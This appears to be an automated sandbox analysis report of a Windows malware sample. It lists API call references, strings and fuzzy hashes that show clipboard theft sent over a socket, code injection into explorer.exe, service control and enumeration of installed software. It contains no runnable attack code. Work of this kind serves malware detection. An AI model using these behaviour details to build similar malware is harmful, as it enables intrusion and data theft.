                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                          • String ID:
                                          • API String ID: 3658366068-0
                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                          APIs
                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                          • GetLastError.KERNEL32 ref: 00455D6F
                                          • __dosmaperr.LIBCMT ref: 00455D76
                                          • GetFileType.KERNEL32(00000000), ref: 00455D82
                                          • GetLastError.KERNEL32 ref: 00455D8C
                                          • __dosmaperr.LIBCMT ref: 00455D95
                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                          • GetLastError.KERNEL32 ref: 00455F31
                                          • __dosmaperr.LIBCMT ref: 00455F38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: \&G$\&G$`&G
                                          • API String ID: 269201875-253610517
                                          • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                          • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 65535$udp
                                          • API String ID: 0-1267037602
                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                          APIs
                                          • OpenClipboard.USER32 ref: 0041697C
                                          • EmptyClipboard.USER32 ref: 0041698A
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                          • String ID: !D@$xdF
                                          • API String ID: 2172192267-3540039394
                                          • Opcode ID: 6e7a658acb981bf194e97a1bd3e3b97bf04fb426e11316d22ad3474e21385c8b
                                          • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                          • Opcode Fuzzy Hash: 6e7a658acb981bf194e97a1bd3e3b97bf04fb426e11316d22ad3474e21385c8b
                                          • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                          • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                          • __dosmaperr.LIBCMT ref: 0043A926
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                          • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                          • __dosmaperr.LIBCMT ref: 0043A963
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                          • _free.LIBCMT ref: 0043A9C3
                                          • _free.LIBCMT ref: 0043A9CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                          • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                          • TranslateMessage.USER32(?), ref: 0040557E
                                          • DispatchMessageA.USER32(?), ref: 00405589
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: bb29f532cbff4e4936c62511684b77f9061ec6679f6d2234e893f2ded877dd36
                                          • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                          • Opcode Fuzzy Hash: bb29f532cbff4e4936c62511684b77f9061ec6679f6d2234e893f2ded877dd36
                                          • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                          APIs
                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                          • String ID: <$@$@VG$@VG$Temp
                                          • API String ID: 1704390241-1291085672
                                          • Opcode ID: 48174c96874ddb1bc79234c66e05c6785ff65f59bcf2873874e0dc4e48980577
                                          • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                          • Opcode Fuzzy Hash: 48174c96874ddb1bc79234c66e05c6785ff65f59bcf2873874e0dc4e48980577
                                          • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe), ref: 004074D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess
                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@
                                          • API String ID: 2050909247-1783200977
                                          • Opcode ID: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                          • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                          • Opcode Fuzzy Hash: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                          • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                          • int.LIBCPMT ref: 00410EBC
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                          • String ID: <kG$@!G$@kG
                                          • API String ID: 3815856325-4100743575
                                          • Opcode ID: 92c60c4b3aca24074658904995ff5281d88556c34e2f97828f11a1926fe6b537
                                          • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                          • Opcode Fuzzy Hash: 92c60c4b3aca24074658904995ff5281d88556c34e2f97828f11a1926fe6b537
                                          • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: f3cbb515e58a4fb37b38339a7557c8d97296d1e23fa900708d81cf8e9cd3026f
                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                          • Opcode Fuzzy Hash: f3cbb515e58a4fb37b38339a7557c8d97296d1e23fa900708d81cf8e9cd3026f
                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                          APIs
                                          • _free.LIBCMT ref: 004481B5
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004481C1
                                          • _free.LIBCMT ref: 004481CC
                                          • _free.LIBCMT ref: 004481D7
                                          • _free.LIBCMT ref: 004481E2
                                          • _free.LIBCMT ref: 004481ED
                                          • _free.LIBCMT ref: 004481F8
                                          • _free.LIBCMT ref: 00448203
                                          • _free.LIBCMT ref: 0044820E
                                          • _free.LIBCMT ref: 0044821C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C738
                                          • DisplayName, xrefs: 0041C7CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                          • API String ID: 1332880857-3614651759
                                          • Opcode ID: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                          • Opcode Fuzzy Hash: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
